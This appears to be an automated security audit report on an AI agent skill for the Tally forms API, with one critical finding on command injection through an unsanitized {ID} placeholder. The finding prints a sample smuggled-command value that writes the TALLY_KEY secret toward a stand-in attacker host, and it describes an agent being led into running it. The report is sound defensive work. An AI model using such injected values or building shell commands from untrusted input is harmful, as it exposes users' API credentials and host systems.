Trust Assessment
tally received a trust score of 72/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified one finding, rated critical (0 high, 0 medium, 0 low severity). The finding is Potential for Command Injection and Credential Exfiltration via Unsanitized Placeholder.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (1)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | Potential for Command Injection and Credential Exfiltration via Unsanitized Placeholder | LLM | SKILL.md:140 |

**Description:** The skill documentation provides `bash` command examples for interacting with the Tally API, specifically for updating forms. These commands use a placeholder `{ID}` (e.g., `https://api.tally.so/forms/{ID}`). If an AI agent directly substitutes untrusted user input into this `{ID}` placeholder without proper shell metacharacter sanitization, it could lead to a command injection vulnerability. An attacker could craft a malicious `{ID}` value (e.g., `123; echo $TALLY_KEY > attacker.com/log.txt; #`) to execute arbitrary commands on the host system or exfiltrate the `TALLY_KEY` (API key) used for authentication, leading to unauthorized access to Tally forms.

**Recommendation:** When constructing shell commands from user input, ensure all variables derived from untrusted sources are rigorously sanitized or properly quoted (e.g., using `printf %q` in bash or equivalent library functions in other languages) to prevent shell metacharacter interpretation. Ideally, use a robust HTTP client library in a programming language that handles URL encoding and parameterization safely, rather than relying on raw shell command execution with string interpolation. The LLM should be explicitly instructed on input sanitization best practices for shell commands.
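The finding's recommendation can be sketched in Python. This is a minimal illustration, not part of the skill itself: `tally_form_url` is a hypothetical helper, and the alphanumeric allowlist pattern is an assumption about what valid Tally form IDs look like, not documented API behavior.

```python
import re
from urllib.parse import quote

def tally_form_url(form_id: str) -> str:
    """Hypothetical helper: build the Tally API URL safely instead of
    interpolating raw input into a shell command string."""
    # Assumed allowlist: treat form IDs as short alphanumeric tokens
    # and reject anything else before it reaches a URL or subprocess.
    if not re.fullmatch(r"[A-Za-z0-9]{1,32}", form_id):
        raise ValueError(f"invalid form ID: {form_id!r}")
    # quote(..., safe="") percent-encodes every reserved character, so
    # even a value that slipped past validation cannot inject shell
    # metacharacters or extra URL path segments.
    return "https://api.tally.so/forms/" + quote(form_id, safe="")

print(tally_form_url("abc123"))  # https://api.tally.so/forms/abc123

# The malicious value from the finding is rejected outright:
try:
    tally_form_url('123; echo $TALLY_KEY > attacker.com/log.txt; #')
except ValueError as err:
    print("rejected:", err)
```

Defense in depth is the point here: validation stops the attack shown in the finding, and percent-encoding ensures that whatever string is ultimately used cannot be reinterpreted by a shell or by the URL parser.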
[Powered by SkillShield](https://skillshield.io/report/7b10d761bff7be79)